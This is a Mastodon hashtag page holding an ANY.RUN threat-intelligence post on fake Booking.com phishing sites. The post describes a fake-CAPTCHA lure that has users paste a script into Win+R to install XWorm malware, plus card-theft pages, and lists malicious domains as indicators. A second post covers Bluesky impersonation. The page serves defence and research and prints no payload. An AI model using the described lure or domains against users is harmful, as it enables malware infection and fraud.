ANY.RUN<p>🚨 Fake Booking.com phishing pages used to deliver malware and steal data<br>⚠️ Attackers use <a href="https://infosec.exchange/tags/cybersquatting" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>cybersquatting</span></a>, mimicking Booking website to create legitimate-looking phishing pages that trick users into executing malicious actions.<br>Leveraging <a href="https://infosec.exchange/tags/ANYRUN" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>ANYRUN</span></a>'s interactivity, security professionals can follow the entire infection chain and gather <a href="https://infosec.exchange/tags/IOCs" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>IOCs</span></a>.</p><p>👨💻 Case 1: The user is instructed to open the Run tool by pressing Win + R, then Ctrl + V to paste the script, and hit Enter. This sequence of actions executes a <a href="https://infosec.exchange/tags/malicious" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>malicious</span></a> script that downloads and runs malware, in this case, <a href="https://infosec.exchange/tags/XWorm" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>XWorm</span></a>.<br>Take a look at the analysis: <a href="https://app.any.run/tasks/61fd06c8-2332-450d-b44b-091fe5094335/?utm_source=mastodon&utm_medium=post&utm_campaign=fake_booking&utm_term=060325&utm_content=linktoservice" rel="nofollow noopener noreferrer" translate="no" target="_blank"><span class="invisible">https://</span><span class="ellipsis">app.any.run/tasks/61fd06c8-233</span><span class="invisible">2-450d-b44b-091fe5094335/?utm_source=mastodon&utm_medium=post&utm_campaign=fake_booking&utm_term=060325&utm_content=linktoservice</span></a></p><p>🔍 TI Lookup request to find domains, IPs, and analysis sessions related to this campaign:<br><a href="https://intelligence.any.run/analysis/lookup?utm_source=mastodon&utm_medium=post&utm_campaign=fake_booking&utm_content=linktoti&utm_term=060325#%7B%2522query%2522:%2522domainName:%255C%2522mktoresp.com%255C%2522%2520AND%2520domainName:%255C%2522booking.*.%255C%2522%2522,%2522dateRange%2522:30%7D%20%20" rel="nofollow noopener noreferrer" translate="no" target="_blank"><span class="invisible">https://</span><span class="ellipsis">intelligence.any.run/analysis/</span><span class="invisible">lookup?utm_source=mastodon&utm_medium=post&utm_campaign=fake_booking&utm_content=linktoti&utm_term=060325#%7B%2522query%2522:%2522domainName:%255C%2522mktoresp.com%255C%2522%2520AND%2520domainName:%255C%2522booking.*.%255C%2522%2522,%2522dateRange%2522:30%7D%20%20</span></a></p><p>🎯 Use this search query to find more examples of this fake <a href="https://infosec.exchange/tags/CAPTCHA" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>CAPTCHA</span></a> technique and enhance your organization's security response:<br><a href="https://intelligence.any.run/analysis/lookup?utm_source=mastodon&utm_medium=post&utm_campaign=fake_booking&utm_content=linktoti&utm_term=060325#%7B%2522query%2522:%2522commandLine:%5C%2522" rel="nofollow noopener noreferrer" translate="no" target="_blank"><span class="invisible">https://</span><span class="ellipsis">intelligence.any.run/analysis/</span><span class="invisible">lookup?utm_source=mastodon&utm_medium=post&utm_campaign=fake_booking&utm_content=linktoti&utm_term=060325#%7B%2522query%2522:%2522commandLine:%5C%2522</span></a></p><p>👨💻 Case 2: In this scenario, threat actors aim to steal victims’ banking information. It’s a typical phishing site that mimics Booking website and, after a few steps, prompts users to enter their card details to ‘verify’ their stay.<br>See example: <a href="https://app.any.run/tasks/87c49110-90ff-4833-8f65-af87e49fcc8d/?utm_source=mastodon&utm_medium=post&utm_campaign=fake_booking&utm_term=060325&utm_content=linktoservice" rel="nofollow noopener noreferrer" translate="no" target="_blank"><span class="invisible">https://</span><span class="ellipsis">app.any.run/tasks/87c49110-90f</span><span class="invisible">f-4833-8f65-af87e49fcc8d/?utm_source=mastodon&utm_medium=post&utm_campaign=fake_booking&utm_term=060325&utm_content=linktoservice</span></a></p><p>📌 A key domain in this campaign, Iili[.]io, was also used by <a href="https://infosec.exchange/tags/Tycoon2FA" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>Tycoon2FA</span></a> <a href="https://infosec.exchange/tags/phishkit" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>phishkit</span></a>.<br>🔍 Use this TI Lookup query to find more examples:<br><a href="https://intelligence.any.run/analysis/lookup?utm_source=mastodon&utm_medium=post&utm_campaign=fake_booking&utm_content=linktoti&utm_term=060325#%7B%2522query%2522:%2522domainName:%255C%2522bzib.nelreports.net%255C%2522%2520AND%2520domainName:%255C%2522xpaywalletcdn.azureedge.net%255C%2522%2520AND%2520domainName:%255C%2522cdnjs.cloudflare.com%255C%2522%2520AND%2520domainName:%255C%2522xpaycdn.azureedge.net%255C%2522%2520AND%2520domainName:%255C%2522iili.io%255C%2522%2522,%2522dateRange%2522:180%7D%20" rel="nofollow noopener noreferrer" translate="no" target="_blank"><span class="invisible">https://</span><span class="ellipsis">intelligence.any.run/analysis/</span><span class="invisible">lookup?utm_source=mastodon&utm_medium=post&utm_campaign=fake_booking&utm_content=linktoti&utm_term=060325#%7B%2522query%2522:%2522domainName:%255C%2522bzib.nelreports.net%255C%2522%2520AND%2520domainName:%255C%2522xpaywalletcdn.azureedge.net%255C%2522%2520AND%2520domainName:%255C%2522cdnjs.cloudflare.com%255C%2522%2520AND%2520domainName:%255C%2522xpaycdn.azureedge.net%255C%2522%2520AND%2520domainName:%255C%2522iili.io%255C%2522%2522,%2522dateRange%2522:180%7D%20</span></a></p><p>Investigate the latest <a href="https://infosec.exchange/tags/malware" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>malware</span></a> and <a href="https://infosec.exchange/tags/phishing" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>phishing</span></a> attacks with <a href="https://infosec.exchange/tags/ANYRUN" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>ANYRUN</span></a> 🚀</p><p><a href="https://infosec.exchange/tags/cybersecurity" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>cybersecurity</span></a> <a href="https://infosec.exchange/tags/infosec" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>infosec</span></a></p>
Recent searches
No recent searches
Search options
Only available when logged in.
shakedown.social is one of the many independent Mastodon servers you can use to participate in the fediverse.
A community for live music fans with roots in the jam scene. Shakedown Social is run by a team of volunteers (led by @clifff and @sethadam1) and funded by donations.
Administered by:
Server stats:
288active users
shakedown.social: About · Status · Profiles directory · Privacy policy
Mastodon: About · Get the app · Keyboard shortcuts · View source code · v4.3.4
#cybersquatting
0 posts · 0 participants · 0 posts today
Stefan Bohacek<p>Interesting story from <span class="h-card" translate="no"><a href="https://social.tedium.co/@tedium" class="u-url mention" rel="nofollow noopener noreferrer" target="_blank">@<span>tedium</span></a></span> about an extortion scheme targeting prominent personalities on Bluesky who don't own their own domain.</p><p>"Cybersquatting is not a new issue, of course, but Bluesky’s decision to tie verification to domains as social proof shows the limitations of the strategy."</p><p><a href="https://tedium.co/2024/12/17/bluesky-impersonation-risks/" rel="nofollow noopener noreferrer" translate="no" target="_blank"><span class="invisible">https://</span><span class="ellipsis">tedium.co/2024/12/17/bluesky-i</span><span class="invisible">mpersonation-risks/</span></a></p><p>I wonder how this would play out in the fediverse.</p><p><a href="https://stefanbohacek.online/tags/bluesky" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>bluesky</span></a> <a href="https://stefanbohacek.online/tags/fediverse" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>fediverse</span></a> <a href="https://stefanbohacek.online/tags/domains" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>domains</span></a> <a href="https://stefanbohacek.online/tags/verification" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>verification</span></a> <a href="https://stefanbohacek.online/tags/cybersquatting" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>cybersquatting</span></a></p>
ExploreLive feeds
Mastodon is the best way to keep up with what's happening.
Follow anyone across the fediverse and see it all in chronological order. No algorithms, ads, or clickbait in sight.
Create accountLoginDrag & drop to upload